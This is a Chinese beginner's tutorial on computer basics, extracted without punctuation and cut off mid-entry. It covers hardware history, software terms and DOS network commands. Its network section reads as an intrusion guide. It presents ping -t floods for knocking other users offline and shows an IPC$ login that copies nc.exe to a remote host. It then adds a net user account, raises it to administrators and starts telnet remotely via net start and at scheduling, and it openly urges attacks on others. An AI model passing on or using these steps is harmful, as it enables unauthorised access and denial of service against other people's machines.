电脑基础知识学习1

电脑基本知识学习 本文章从简单到复杂加入有些自己的书籍上没有的微软没公布的 1 硬件基础 2 DOS 系统命令 3 注册表系统迁移补丁 4 WINDOWS 网络命令 1 硬件基础 计算机入门知识计算机入门知识 计算机的诞生酝酿了很长一段时间 1946年2月 第一台电子计算机ENIAC 在美国加州问世 ENIAC用了18000个电子管和86000个其它电子元件 有两个教 室那么大 运算速度却只有每秒300次各种运算或5000次加法 耗资100万美元以 上 尽管ENIAC有许多不足之处 但它毕竟是计算机的始祖 揭开了计算机时代的 序幕 计算机的发展到目前为止共经历了四个时代 从1946年到1959年这段时期我 们称之为 电子管计算机时代 第一代计算机的内部元件使用的是电子管 由于 一部计算机需要几千个电子管 每个电子管都会散发大量的热量 因此 如何散 热是一个令人头痛的问题 电子管的寿命最长只有3000小时 计算机运行时常常 发生由于电子管被烧坏而使计算机死机的现象 第一代计算机主要用于科学研究 和工程计算 从1960年到1964年 由于在计算机中采用了比电子管更先进的晶体管 所以 我们将这段时期称为 晶体管计算机时代 晶体管比电子管小得多 不需要暖机 时间 消耗能量较少 处理更迅速 更可靠 第二代计算机的程序语言从机器语 言发展到汇编语言 接着 高级语言FORTRAN语言和cOBOL语言相继开发出来并 被广泛使用 这时 开始使用磁盘和磁带作为辅助存储器 第二代计算机的体积 和价格都下降了 使用的人也多起来了 计算机工业迅速发展 第二代计算机主 要用于商业 大学教学和政府机关 从1965年到1970年 集成电路被应用到计算机中来 因此这段时期被称为 中 小规模集成电路计算机时代 集成电路 Integrated Circuit 简称r 是做在晶片 上的一个完整的电子电路 这个晶片比手指甲还小 却包含了几千个晶体管元件 第三代计算机的特点是体积更小 价格更低 可靠性更高 计算速度更快 第三 代计算机的代表是IBM公司花了50亿美元开发的IBM 360系列 从1971年到现在 被称之为 大规模集成电路计算机时代 第四代计算机使 用的元件依然是集成电路 不过 这种集成电路已经大大改善 它包含着几十万 到上百万个晶体管 人们称之为大规模集成电路 LargeScale lntegrated Circuit 简称LSI 和超大规模集成电路 Very Large Scale lntegrated Circuit 简称VLSI 1975年 美国1BM公司推出了个人计算机PC PersonaI Computer 从此 人们对 计算机不再陌生 计算机开始深入到人类生活的各个方面 计算机的基本组成计算机的基本组成计 算机的主要组成部分可以归纳为以下五个部分 输入设备 存储器 运算器 控 制器和输出设备 输入设备 输入设备是计算机的重要组成部分 输入设备与输出设备合你为外部设备 简称外设 输入设备的作用是将程序 原始数据 文字 字符 控制命令或现场 采集的数据等信息输入到计算机 常见的输入设备有键盘 鼠标器 光电输入机 磁带机 磁盘机 光盘机等 存储器 存储器的功能是存储程序 数据和各种信号 命令等信息 并在需要时提供 这些信息 运算器 运算器的功能是对数据进行各种算术运算和逻辑运算 即对数据进行加工处 理 控制器 是整个计算机的中枢神经 其功能是对程序规定的控制信息进行解释 根据 其要求进行控制 调度程序 数据 地址 协调计算机各部分工作及内存与外设 的访问等 输出设备 输出设备与输入设备同样是计算机的重要组成部分 它把外算机的中间结果 或最后结果 机内的各种数据符号及文字或各种控制信号等信息输出出来 微机 常用的输出设备有显示终端CRT 打印机 激光印字机 绘图仪及磁带 光盘机 等 计算机的分类计算机的分类计算机可分为模拟计算机和数字计算机两大类 模拟计算机的主要特点是 参与运算的数值由不间断的连续量表示 其运算 过程是连续的 模拟计算机由于受元器件质量影响 其计算精度较低 应用范围 较窄 目前已很少生产 数字计算机的主要特点是 参与运算的数值用断续的数字量表示 其运算过 程按数字位进行计算 数字计算机由于具有逻辑判断等功能 是以近似人类大脑 的 思维 方式进行工作 所以又被称为 电脑 数字计算机按用途又可分为专用计算机和通用计算机 专用与通用计算机在其效率 速度 配置 结构复杂程度 造价和适应性等 方面是有区别的 专用计算机针对某类问题能显示出最有效 最快速和最经济的特性 但它的 适应性较差 不适于其它方面的应用 我们在导弹和火箭上使用的计算机很大部 分就是专用计算机 这些东西就是再先进 你也不能用它来玩游戏 通用计算机适应性很强 应用面很广 但其运行效率 速度和经济性依据不 同的应用对象会受到不同程度的影响 通用计算机按其规模 速度和功能等又可分为巨型机 大型机 中型机 小 型机 微型机及单片机 这些类型之间的基本区别通常在于其体积大小 结构复 杂程度 功率消耗 性能指标 数据存储容量 指令系统和设备 软件配置等的 不同 一般来说 巨型计算机的运算速度很高 可达每秒执行几亿条指令 数据存 储容量很大 规模大结构复杂 价格昂贵 主要用于大型科学计算 它也是衡量 一国科学实力的重要标志之一 单片计算机则只由一片集成电路制成 其体积小 重量轻 结构十分简单 性能介于巨型机和单片机之间的就是大型机 中型机 小型机和微型机 它们的性能指标和结构规模则相应的依次递减 电脑的常见硬电脑的常见硬 件设备件设备 一台电脑是由许许多多的零部件组成 只有这些零部件组合在一起协 调的工作 才能称之为电脑 电脑发展到现在 其零部件都有了很大的变化 但 其工作原理却没有变 其中包括主板 CPU 内存 硬盘 显卡 声卡等等 下 面将简单的介绍组成电脑的各个零部件 1 主板主板 图一 主板图解 主板是整个电脑的基板 是CPU 内存 显卡及各种扩展卡的载体 主板是 否稳定关系着整个电脑是否稳定 主板的速度在一定程度上也制约着整机的速度 2 CPU 图二 CPU就是中央处理器 也就是负责运算和控制的控制中心 是电脑的关键部 位 相当于人的大脑一样 3 内存内存 图三 DDR400 内存是电脑的一个临时存储器 它只负责电脑数据的中转而不能永久保存 它的容量和处理速度直接决定了电脑数据传输的快慢 和CPU 硬盘一起并称为 电脑的三大件 4 硬盘硬盘 图四 硬盘 硬盘是我们熟知的电脑配件之一 简单的说就是一个大容量存储器 与主机 通讯速度很快 成为现代电脑不可缺少的配件 5 显卡显卡 图五 GF4 TI4200显卡 显卡的作用就是提供对图像数据的快速处理 显卡也是电脑的重要组成部件 之一 而且也是更新换代最快的一个部件 目前很多3D游戏对显卡的要求都很高 因此我们不得不掏钱从新买一块显卡来更新换代 6 显示器显示器 图六 17 纯平显示器 显示器 顾名思义就是电脑的一个显示设备 和电视原理差不多 一般来说 显示器的身价决定于它所采用的显象管 好的显象管可以提供更好的视觉效果 寿命也更长 7 键盘 鼠标键盘 鼠标 图七 无线鼠标和键盘 鼠标 键盘一直以来都不被许多人所重视 不过它们却是现代电脑不可缺少 的输入设备 没有它们就相当于人没有手一样 8 其它设备其它设备 现代电脑除了上面所列举的七大类配件外 还有很多的相关配件 包括有网 卡 声卡 MODEM 打印机 扫描仪 绘图仪 手写板等等很多东西 这里就不 再一一列举 电脑的软件组成电脑的软件组成如果一台电脑只有硬件的话 那么它只能说具有一副骨架而已 只有装上了软件过后 电脑才能被称之为真正的电脑 1 硬件驱动程序 光是有硬件 电脑并不能工作 必须要有能驱使硬件工作的软件才能让硬件 工作 这种软件就是我们平常所说的驱动程序 任何电脑硬件都必须要有驱动程序驱动才能工作 否则就一点用处没有 驱 动程序是电脑软件中最基本的软件 也是保障电脑能顺利工作的基础 从WINDOWS98以后的操作系统中 都收集了很多常见设备的驱动程序 不过 有些设备必须单独装驱动 各种驱动程序之间极有可能产生不兼容的情况 如果 这样 你最先考虑的就是换一个驱动程序试试 2 操作系统 操作系统是大家听得最多的一种软件 它为电脑中其它应用程序提供了一个 操作平台 就好象我们吃饭的桌子一样为我们提供了一个可以操作平台 目前电脑中常见的操作系统有微软的WINDOWS98 WINDOWS2000 和 WINDOWS XP WIN7 WIN10等 还有WINDOWS NT linux等 图八 WINDOWS98桌面 3 应用软件 应用程序就是我们日常用到的软件程序 这些程序可以帮助我们完成生活中 的很多工作 也就是真正能体现电脑用途的东西 电脑发展到现在 应用软件也涉及到了社会的各个领域 几乎在能用电脑工 作的地方 都能对应有一种以上的应用软件 图九 Word2000的操作窗口 常用软件主要有哪些类型常用软件主要有哪些类型常用软件主要有三种类型 Demos 演示软件 商业发行的软件为了让用户先了解软件的功能而发布的一个版本 主要介绍软件 可以实现的功能和软件的特性 如果你喜欢这个软件 可以去购买正式版本 Shareware 共享软件 购买或注册前你可以试用的一类软件 这类软件有版权 但是你可以免费下载并 使用 但是 在一定的试用时间后 你必须注册或者购买这个软件以继续使用 需要注意的是 共享软件多数不是永久免费的 开发者的目的还是希望用户最终 购买他们的产品 所以共享软件往往被限制了使用时间 或者只提供了部分功能 不过与纯粹的免费软件相比 共享软件在安全方面要强得多 Freeware 免费软件 你可以免费下载 使用 在同事和朋友之间传递 和共享软件不同的是 你无须 注册这个软件就可以使用其提供的所有功能 常见电脑名词术语解释常见电脑名词术语解释 基础术语基础术语计算机硬件是软件运行的基础 而软件则是 发挥硬件作用的关键 许多入门者除了学用各种软件外 还可能尝试着自己编编 程序 那么建议最好先熟悉以下的基础名词 以便尽快进入角色 基础术语 程序 用汇编语言 高级语言等开发编制出来的可以运行的文件 软件 从开发商的角度而言 软件就是全部程序和全部开发文档的集合 从 用户的角度而言 软件应该是程序 说明书 服务的总合 所以买正版软件就理 应得到正规说明书和维护 升级等相关服务 数制 虽然计算机能极快地进行运算 但其内部并不像人类在实际生活中使用 的十进制 而是使用只包含0和1两个数值的二进制 当然 人们输入计算机的十进制 被转换成二进制进行计算 计算后的结果又由二进制转换成十进制 这都由操作 系统自动完成 并不需要人们手工去做 学习汇编语言 就必须了解二进制 还有八进 制 十六进制 数据 狭义的理解 数据就是数值 即0 1 2 3 4 5 6 7 8 9和符号 小数点组成的数值 广义地讲 计算机所能处理的数据是指计算机能接受 存储 处 理的任何信息 除了数值外 还有字符数据 图形数据 音频数据 视频数据 控制 信号数据等等 数据类型 在处理各种数据时 为了便于处理 查错和充分利用存储空间 许多 开发环境都要求对数据类型进行说明 一般有整数型 实数型 字符串型 布尔型 日期型 备注型 浮点型 双精度型等等 数据运算 一般指对数据所施加的各种处理 如插入数据 修改旧数据 删除 已无用的数据 查找数据 将数据按一定规则排序 打印数据等等 数据结构 在编程中 除了考虑功能如何实现外 还必须考虑到程序中所涉 及到的数据组织方式 其一是为了提高执行效率 其二是在特定的功能中 必须 将数据以特殊的结构进行存放 常用的数据结构有线性表 栈 队列 树 二叉 树 图 哈希表等结构 逻辑结构 指对数据的组织形式 如社会生活中的人事组织可用树型逻辑结 构表示 选择好逻辑结构对软件的实现有重大意义 常见电脑名词术语解释常见电脑名词术语解释 操作术语操作术语计算机硬件是软件运行的基础 而软件则是发挥硬件作用的关键 许多 入门者除了学用各种软件外 还可能尝试着自己编编程序 那么建议最好先熟悉 以下的基础名词 以便尽快进入角色 操作术语 操作系统 计算机硬件系统外面加载的第一道软件系统 专门用于管理计算 机硬件和其它软件 响应用户对硬件和软件的操作 在微机上常见的有 DOS Windows3 2 Win95 98 NT等 安装程序 由于目前的软件都涉及许多文件和子目录 所以一般都提供安装程 序帮助用户自动化地安装全部文件 一般标准的安装程序均起名Setup exe或 Install exe 病毒 一种计算机程序 它可以附属在可执行文件或隐藏在系统数据区中 在开机或执行某些程序后悄悄地进驻内存 然后对其它的文件进行传染 使之传 播出去 然后在特定的条件下破坏系统或骚扰用户 目前已有较成熟的清除病毒 软件 但是新病毒还是层出不穷 成为一大危害 集成开发环境 较早期程序设计的各个阶段都要用不同的软件来进行处理 如 先用字处理软件编辑源程序 然后用链接程序进行函数 模块连接 再用编译程序进 行编译 开发者必须在几种软件间来回切换操作 现在的编程开发软件将编辑 编 译 调试等功能集成在一个桌面环境中 这样就大大方便了用户 拷贝 指将文件从一处复制一份完全一样的到另一处 而原来的一份依然保留 删除 指将文件从系统的目录清单中删掉 但许多情况下 用工具软件或 Windows下自带的 回收站 均能恢复被删掉的文件 为了保险起见 用户最好养成 对自己输入的文本或其它文件进行软盘备份 以防万一 移动 就是将拷贝操作和删除操作合二为一 原来的一份在拷贝完成后即被 自动删掉 共享 这是在网络环境下文件使用时的一种设置属性 一般指多个用户可以同 时打开或使用同一个文件 或数据 独占 系指文件 或数据 同一时刻只能被一个用户打开 其它用户只能等待此 用户放弃后 才能打开和使用它 压包 用工具软件将文件进行压缩存储的过程 常用的压包工具有WinZip Arj等 解包 压包的反过程 即将压包文件还原成原来的文件 加密 在网络通讯中 为了保证传输数据的保密性 用密码对文件进行加密变换 解密 加密的反过程 使之变成可使用的正常数据 上传 本地计算机与其它计算机通过网络连接成功后 将本机文件拷贝到其 它计算机中的过程 下载 在网络中 将对方计算机中的文件拷贝至本地计算机中的过程 通配符 在DOS操作系统下 为了提高对文件处理的效率 用 或 表示任意多个 或一个字符 这样就可以一次性处理一批文件 如 即代表当前目录下的全部可 见文件 内部命令 启动了DOS操作系统后 任何时候都能使用的命令 如DIR COPY等 因为这样命令已编在COMMAND COM文件中 外部命令 虽然也是DOS命令 但它们是经过同名的程序文件提供的功能 若程 序文件被删除 则此命令将不可使用 如DISKCOPY FORMAT等 格式化 指对磁盘进行使用前的预处理以便存入数据 一般而言 新盘是必须 格式化的 而使用过的旧盘也可以格式化 格式化后磁盘上全部数据将被删除 磁盘拷贝 指将一张软盘的全部内容原样不变地复制在另一张同样规格的软 盘上 因为软盘上可能有系统数据区或被隐含的文件或子目录 所以不能用一般的 复制操作进行磁盘拷贝 只能用如DISKCOPY命令或使用HD COPY等工具软件进行 磁盘拷贝 常见电脑名词术语解释常见电脑名词术语解释 开发术语开发术语计算机硬件是软件运行的基础 而软件则是 发挥硬件作用的关键 许多入门者除了学用各种软件外 还可能尝试着自己编编 程序 那么建议最好先熟悉以下的基础名词 以便尽快进入角色 开发术语 流程图 使用图形表示算法的思路是一种极好的方法 因为千言万语不如一 张图 流程图在汇编语言和早期的BASIC语言环境中得到应用 由于其中的转向过 于任意 带来了许多副作用 现已趋向消亡 较新的是有利于结构化程序设计的 PAD图 对PASCAL或C语言都极适用 汇编语言 计算机中真正可以处理的只是由 0 1 组成的二进制代码 这 种指令代码易出错且不易修改 由于依赖于机器 使用极不方便 于是人们发明 指令的助记符 用几个字母 往往就是其含义的英文单词或缩写 代替某条指 令 如加法用ADD表示 这种符号系统的扩大就是汇编语言 使用汇编语言编程 优点是运行效率高 可直接对硬件内部进行控制 缺点是需对硬件有更深入的了 解 而且编程效率不高 并且与机器的体系结构仍有一定的依赖关系 汇编程序 由于机器并不能直接识别和运行用汇编语言编制出的程序 必须 先转换成对应的机器代码指令 这项工作不用手工完成 仅需交给称为 汇编程序 的软件处理一下 即可得到可以直接运行的程序文件 基于这种关系 人们将用 汇编语言编出来的程序称为 源程序 称用汇编程序处理后产生的程序为 目的程 序 高级语言 由于汇编语言依赖于硬件体系 且助记符量大难记 于是人们又 发明了更加易用的所谓高级语言 在这种语言下 其语法和结构更类似普通英文 且由于远离对硬件的直接操作 使得一般人经过学习之后都可以编程 根据应用 范围的不同和历史的发展 高级语言有很多种 如 BASIC FORTRAN C PASCAL LISP FOXPRO COBOL 解释程序 对源程序边解释翻译成机器代码边执行的高级语言程序 由于它 的方便性和交互性较好 早期一些高级语言采用这种方式 如BASIC dBASE 但 它的弱点是运行效率低 程序的运行依赖于开发环境 不能直接在操作系统下运 行 编译程序 为了提高运行效率和对源程序的保密 人们推出了可以一次性将 源程序转换成可执行代码的程序开发软件 它产生可以在操作系统下直接执行的 程序 且运行速度比用解释程序执行快得多 但是它要求全部源程序的语法都必 须正确 这样调试时就不太方便 为了融合解释和编译的优点 目前许多开发系 统已同时提供这两种功能 Bug 程序中隐藏的功能缺陷或错误 由于现在的软件复杂程度早已超出了一般 人能控制的范围 如Win95 Win98这样的较成熟的操作系统也会不定期地公布其 中的Bug 如何减少以至消灭程序中的Bug 一直是程序员所极为重视的课题 调试 编好程序后 用各种手段进行查错和排错的过程 作为程序的正确性 不仅仅表现在正常功能的完成上 更重要的是对意外情况的正确处理 注意 调 试的指导思想是尽量证明该程序是有错的 而不是证明它是正确的 所以从心理 学的角度考虑 开发人员和调试人员不应该是同一个人 模块化 按照功能将一个软件切分成许多部分单独开发 然后再组装起来 每一 个部分即为模块 其优点是利于控制质量 利于多人合作 利于扩充功能等 是软 件工程中一种重要的开发方法 可移植性 由于计算机的硬件体系结构不同 因而导致在某一类型机器上开 发的软件不能在另一类计算机上运行 所以某一种语言开发环境开发出来的程序 如 不用修改或只需极少量的修改便能在其它种类的计算机上运行 就是可移植性好 过程 建立模块化的主要机制 它主要用于完成特定的工作 可以返回某些运算 的结果 也可以不返回任何结果 单入口单出口 为了保证开发程序的质量 要求过程中的数据流控制是必须在 固定的程序段入口进入 固定的出口返回 不允许在编程中随意使用数据 软件生命周期 软件的产生直到报废的生命周期 周期内有问题定义 可行 性分析 总体描述 系统设计 编码 调试和测试 验收与运行 维护升级到废 弃等阶段 这种按时间分程的思想方法是软件工程中的一种思想原则 即按部就 班 逐步推进 每个阶段都要有定义 工作 审查 形成文档以供交流或备查 以提高软件的质量 但随着新的面向对象的设计方法和技术的成熟 软件生命周 期设计方法的指导意义正在逐步减少 人工智能 就是通过程序使计算机能进行一些思维推理 使其具备一定的环 境适应 自动学习 自动决策等人类高级智能 目前在人机对话 智能机器人 专家系统 语言图像识别 问题求解 公式推导 定理证明等许多领域 人工智 能都已有较成熟的系统 随着计算机硬件体系的进步 人工智能必将更深入人们 的生活 1 DOS 网络命令讲解 系统 一 ping 它是用来检查网络是否通畅或者网络连接速度的命令 作为一个生活在网络上的 管理员或者黑客来说 ping 命令是第一个必须掌握的 DOS 命令 它所利用的原理是这样的 网络上的机器都有唯一确定的 IP 地址 我们给目标 IP 地址发送一个数据包 对方就要返回 一个同样大小的数据包 根据返回的数据包我们可以确定目标主机的存在 可以初步判断 目标主机的操作系统等 下面就来看看它的一些常用的操作 先看看帮助吧 在 DOS 窗口 中键入 ping 回车 在此 我们只掌握一些基本的很有用的参数就可以了 下同 t 表 示将不间断向目标 IP 发送数据包 直到我们强迫其停止 试想 如果你使用 100M 的宽带 接入 而目标 IP 是 56K 的小猫 那么要不了多久 目标 IP 就因为承受不了这么多的数据 而掉线 呵呵 一次攻击就这么简单的实现了 l 定义发送数据包的大小 默认为 32 字节 我们利用它可以最大定义到 65500 字节 结合上面介绍的 t 参数一起使用 会有更好的效 果哦 n 定义向目标 IP 发送数据包的次数 默认为 3 次 如果网络速度比较慢 3 次对我 们来说也浪费了不少时间 因为现在我们的目的仅仅是判断目标 IP 是否存在 那么就定义 为一次吧 说明一下 如果 t 参数和 n 参数一起使用 ping 命令就以放在后面的参数为标 准 比如 ping IP t n 3 虽然使用了 t 参数 但并不是一直 ping 下去 而是只 ping 3 次 另外 ping 命令不一定非得 ping IP 也可以直接 ping 主机域名 这样就可以得到主机的 IP 下面我们举个例子来说明一下具体用法 这里 time 2 表示从发出数据包到接受到返回数据包所用的时间是 2 秒 从这里可以判断网 络连接速度的大小 从 TTL 的返回值可以初步判断被 ping 主机的操作系统 之所以说 初 步判断 是因为这个值是可以修改的 这里 TTL 32 表示操作系统可能是 win98 小知识 如果 TTL 128 则表示目标主机可能是 Win2000 如果 TTL 250 则目标主机可 能是 Unix 至于利用 ping 命令可以快速查找局域网故障 可以快速搜索最快的 QQ 服务器 可以对别 人进行 ping 攻击 这些就靠大家自己发挥了 二 nbtstat 该命令使用 TCP IP 上的 NetBIOS 显示协议统计和当前 TCP IP 连接 使用这个命令你可以得到远程主机的 NETBIOS 信息 比如用户名 所属的工作组 网卡的 MAC 地址等 在此我们就有必要了解几个基本 的参数 a 使用这个参数 只要你知道了远程主机的机器名称 就可以得到它的 NETBIOS 信息 下同 A 这个参数也可以得到远程主机的 NETBIOS 信息 但需要你知道它的 IP n 列出本地机器的 NETBIOS 信息 当得到了对方的 IP 或者机器名的时候 就可以使用 nbtstat 命令来进一步得到对方的信息了 这又增加了我们入侵的保险系数 三 netstat 这是一个用来查看网络状态的命令 操作简便功能强大 a 查看本地机器的所有开放端口 可以有效发现和预防木马 可以知道机器所开的服务等信息 这里可以看出本地机器开放 有 FTP 服务 Telnet 服务 邮件服务 WEB 服务等 用法 netstat a IP r 列出当前的路由信息 告诉我们本地机器的网关 子网掩码等信息 用法 netstat r IP 四 tracert 跟踪路由信息 使用此命令可以查出数据从本地机器传输到目标主机所经 过的所有途径 这对我们了解网络布局和结构很有帮助 这里说明数据从本地机器传输到 192 168 0 1 的机器上 中间没有经过任何中转 说明这两台机器是在同一段局域网内 用 法 tracert IP 五 net 这个命令是网络命令中最重要的一个 必须透彻掌握它的每一个子 命令的用法 因为它的功能实在是太强大了 这简直就是微软为我们提供的最好的入侵工 具 首先让我们来看一看它都有那些子命令 键入 net 回车 在这里 我们重点掌握几 个入侵常用的子命令 net view 使用此命令查看远程主机的所以共享资源 命令格式为 net view IP net use 把远程主机的某个共享资源影射为本地盘符 图形界面方便使用 呵呵 命令格式为 net use x IP sharename 上面一个表示把 192 168 0 5IP 的共享名为 magic 的目录影射为 本地的 Z 盘 下面表示和 192 168 0 7 建立 IPC 连接 net use IP IPC password user name 建立了 IPC 连接后 呵呵 就可以上传文件 了 copy nc exe 192 168 0 7 admin 表示把本地目录下的 nc exe 传到远程主机 结合后 面要介绍到的其他 DOS 命令就可以实现入侵了 net start 使用它来启动远程主机上的服务 当你和远程主机建立连接后 如果发现它的什么服务没有启动 而你又想利用此服务怎么 办 就使用这个命令来启动吧 用法 net start servername 成功启动了 telnet 服务 net stop 入侵后发现远程主机的某个服务碍手碍脚 怎么办 利用这个命令停掉就 ok 了 用法和 net start 同 net user 查看和帐户有关的情况 包括新建帐户 删除帐户 查看特定帐户 激活帐户 帐户禁用 等 这对我们入侵是很有利的 最重要的 它为我们克隆帐户提供了前提 键入不带参数 的 net user 可以查看所有用户 包括已经禁用的 下面分别讲解 1 net user abcd 1234 add 新建一个用户名为 abcd 密码为 1234 的帐户 默认为 user 组 成员 2 net user abcd del 将用户名为 abcd 的用户删除 3 net user abcd active no 将用户名为 abcd 的用户禁用 4 net user abcd active yes 激活用户名为 abcd 的用户 5 net user abcd 查看用户名为 abcd 的用户的情况 net localgroup 查看所有和用户组有关的信息和进行相关操作 键入不带参数的 net localgroup 即列出当前 所有的用户组 在入侵过程中 我们一般利用它来把某个帐户提升为 administrator 组帐户 这样我们利用这个帐户就可以控制整个远程主机了 用法 net localgroup groupname username add 现在我们把刚才新建的用户 abcd 加到 administrator 组里去了 这时候 abcd 用户已经是超级管理员了 呵 呵 你可以再使用 net user abcd 来查看他的状态 和图 10 进行比较就可以看出来 但这样 太明显了 网管一看用户情况就能漏出破绽 所以这种方法只能对付菜鸟网管 但我们还 得知道 现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员 这 是后话 有兴趣的朋友可以参照 黑客防线 第 30 期上的 由浅入深解析隆帐户 一文 net time 这个命令可以查看远程主机当前的时间 如果你的目标只是进入到远程主机里面 那么也 许就用不到这个命令了 但简单的入侵成功了 难道只是看看吗 我们需要进一步渗透 这就连远程主机当前的时间都需要知道 因为利用时间和其他手段 后面会讲到 可以实 现某个命令和程序的定时启动 为我们进一步入侵打好基础 用法 net time IP 六 at 这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序 知道 net time 的重 要了吧 当我们知道了远程主机的当前时间 就可以利用此命令让其在以后的某个时间 比如 2 分钟后 执行某个程序和命令 用法 at time command computer 表示在 6 点 55 分时 让名称为 a 01 的计算机开启 telnet 服务 这里 net start telnet 即为开启 telnet 服 务的命令 七 ftp 大家对这个命令应该比较熟悉了吧 网络上开放的 ftp 的主机很多 其中很大一部分是匿名的 也就是说任何人都可以登陆上去 现在如果你扫到了一台开放 ftp 服务的主机 一般都是开了 21 端口的机器 如果你还不会使用 ftp 的命令怎么办 下 面就给出基本的 ftp 命令使用方法 首先在命令行键入 ftp 回车 出现 ftp 的提示符 这时 候可以键入 help 来查看帮助 任何 DOS 命令都可以使用此方法查看其帮助 大家可能 看到了 这么多命令该怎么用 其实也用不到那么多 掌握几个基本的就够了 首先是登 陆过程 这就要用到 open 了 直接在 ftp 的提示符下输入 open 主机 IP ftp 端口 回车即 可 一般端口默认都是 21 可以不写 接着就是输入合法的用户名和密码进行登陆了 这 里以匿名 ftp 为例介绍 用户名和密码都是 ftp 密码是不显示的 当提示 logged in 时 就说明登陆成功 这里因为是匿名登陆 所以用户显示为 Anonymous 接下来就要介绍具 体命令的使用方法了 dir 跟 DOS 命令一样 用于查看服务器的文件 直接敲上 dir 回车 就可以看到此 ftp 服务器上的文件 cd 进入某个文件夹 get 下载文件到本地机器 put 上传文件到远程服务器 这就要看远程 ftp 服务器是否给了你可写的权限了 如果可以 呵呵 该怎么 利用就不多说了 大家就自由发挥去吧 delete 删除远程 ftp 服务器上的文 件 这也必须保证你有可写的权限 bye 退出当前连接 quit 同上 八 telnet 功能强大的远程登陆命令 几乎所有的入侵者都喜欢用它 屡试不爽 为什么 它操作简 单 如同使用自己的机器一样 只要你熟悉 DOS 命令 在成功以 administrator 身份连接了远程机器后 就可以用它来干你想干的一切了 下面介绍一下使 用方法 首先键入 telnet 回车 再键入 help 查看其帮助信息 然后在提示符下键入 open IP 回车 这时就出现了登陆窗口 让你输入合法的用户名和密码 这里输入任何密码都是不 显示的 当输入用户名和密码都正确后就成功 建立了 telnet 连接 这时候你就在远程主机上具有了和此用户一样的权限 利用 DOS 命令 就可以实现你想干的事情了 这里我使用的超级管理员权限登陆的 到这里为止 网络 DOS 命令的介绍就告一段落了 这里介绍的目的只是给菜鸟网管一个印象 让其知道熟悉 和掌握网络 DOS 命令的重要性 其实和网络有关的 DOS 命令还远不止这些 这里只是抛砖 引玉 希望能对广大菜鸟网管有所帮助 学好 DOS 对当好网管有很大的帮助 特别的熟练 掌握了一些网络的 DOS 命令 另外大家应该清楚 任何人要想进入系统 必须得有一个合 法的用户名和密码 输入法漏洞差不多绝迹了吧 哪怕你拿到帐户的只有一个很小的权限 你也可以利用它来达到最后的目的 所以坚决消灭空口令 给自己的帐户加上一个强壮的 密码 是最好的防御弱口令入侵的方法 最后 由衷的说一句 培养良好的安全意识才是最重要的 DOS 讲解 虽然现在大家用的都是 Windows 9x 或是 Windows 2000 XP 而且我们在这里学 习的主要内容也是 DOS 所不擅长的网络 但即使是在 Windows 风行的现在我们也离不开 DOS 如果你能熟练使用 DOS 那它可以给你带来极大的方便 而且在我们的 Windows 出 现问题的时候大多也都是用 DOS 来修复的 所以学习一些 DOS 知识是必要的 在这里我给大家讲的是一些用来安装和修复系统的命令 并不涉及网络方面 基础 DOS 是英语中 Disk Operation System 磁盘操作系统 的缩写 其实 DOS 的版本有很多 比如 MS DOS PC DOS FreeDOS 等等 现在我们最常用的是 MS DOS MS 是 Microsoft 的缩写 在 1995 年前 当 Windows 95 还没有出现的年代里 那是 DOS 的天下 MS DOS 的最终独 立版本是 MS DOS 6 22 再后来的 DOS 7 0 及其它后续版本都是在 Windows 里带的 不是 单独发行版本 在 DOS 环境下 我们面对的不是桌面和图标 而是这样的电脑屏幕 这个 C 叫做提示符 这个闪动的横线叫做光标 这时候 DOS 已经准备好 我们现在所需要做的 就是输入一个 命令让 DOS 去执行 在 DOS 中 每条命令输入完成后要都要以回车做为确认或者说是终结 例 在 DOS 里 盘符用英文字母加上冒号来表示 如 A C D Windows 中的 文件夹 被称为 目 录 用 来分隔不同层的目录 最上层的单独一个 如 C 或只一个 叫 根目 录 我们可以输入 dir 显示目录内容 以后将讲到它的具体使用方法 命令来查看当前 目录中的子目录及文件 例 如图所示 后面带有的是目录 没有的则是文件 在 DOS 中 文件名的规则是 8 3 形式 即一个文件名由文件基本名和文件扩展名组 成 中间 用点 隔开 文件基本名由不超过 8 个英文字母或数字组成 文件扩展名由不超过三个 英文字母或数字组成 文件基本名必须有 扩展名可以没有 看上图 第一列的就是 文 件基本名 第二列的是 文件扩展名 注意 在用 dir 命令显示文件列表时 文件基本 名和扩展名之间并无 分隔符 但你在输入完整的文件名时必须输入它 第三列显示的是文件的大小 表示它占用了多少存储空间 也就是文件包含信息的多少 包含的信息越多 文件就越大 第四列表示的是文件建立的日期或者是最后被改动的日期 每个文件都有对应的生成时间 就象每个人都有自己的生日一样 文件的生成时间就是文件形成的时候 时间采用通常的 表示方法 由年 月 日组成 最后一列表示文件生成的具体时间 最后的一个字母 a 表示上午 p 表示下午 我们再来 看看倒数一二行 这些是什么意思呢 10 file s 是要告诉你这个目录内有 10 个文 件 这些文件加起来一共有 64 692 bytes 大 在这种计算中 每个子目录也算是一个 文件 但它的大小算零 最后一行的是告诉你当前你的工作磁盘上还剩下 215 735 513 bytes 大小可用的磁盘空间 用 dir 命令来查看磁盘上文件时 你会发 现文件后缀 即文件扩展名 有很多种 它们当中大部分都是有一定含义的 其中凡后缀 为 exe com 或 bat 的文件都是可以直接执行的 这些以 exe 为后缀的文件叫可执行文件 以 com 为后缀的文件叫命令文件 以 bat 为后缀的文件叫批处理文件 如果我们要执行这 些文件 只需在提示符下敲入文件基本名然后回车即可 不需输入文件后缀 基本命令 DOS 的命令使用方法 大多都是这种格式 命令名 参数 1 参数 2 参数 3 参数 4 参数 5 选项 参数 6 说明 以上命令中 命令名 是必要的 加方括号的参数是可选的 加竖线的两个命令只 能选其一 加大括号的是必选项 如上命令解释是这样的 命令名是必须要有的 参数 1 是必须的 参数 2 是可选的 参数 3 和 参数 4 两个参数只能选用其中一个 不能两个同时用 参数 5 使用时要加选项 用 分隔 参数 6 使用时要加选项 但 选项 1 和 选项 2 要且仅能选用其中一个 不能两个都用 但也不能两个都不用 这也是 DOS 命令书写的规范吧 所有的 DOS 命令使用方法都是这样写的 大家也可以自己 看看 一般的命令都可以用 参数或不加参数来查看帮助 在这里我们只讲这些命令 的基本使用方法 有些命令在使用时 可以使用 通配符 通配符有两个 和 其中 代表任 意个任何字符 只代表一个任意字符 在有些命令中 驱动器和路径是可选项 如果不指明驱去器名 默认为当前驱去器 如果 不指明目录则默认为当前目录 dir 使用方法 DIR 盘符 路径 文件名 P W A P 每满一页时暂停 W 使用横向显示方式 A 显示所 以文件 B 只显示文件名功能 显示一类或所以文件列表 支持通配符 例 cd 使用方法 cd 目录名 目录名 目录名 功能 显示或改变当前目录 例 md 使用方法 md 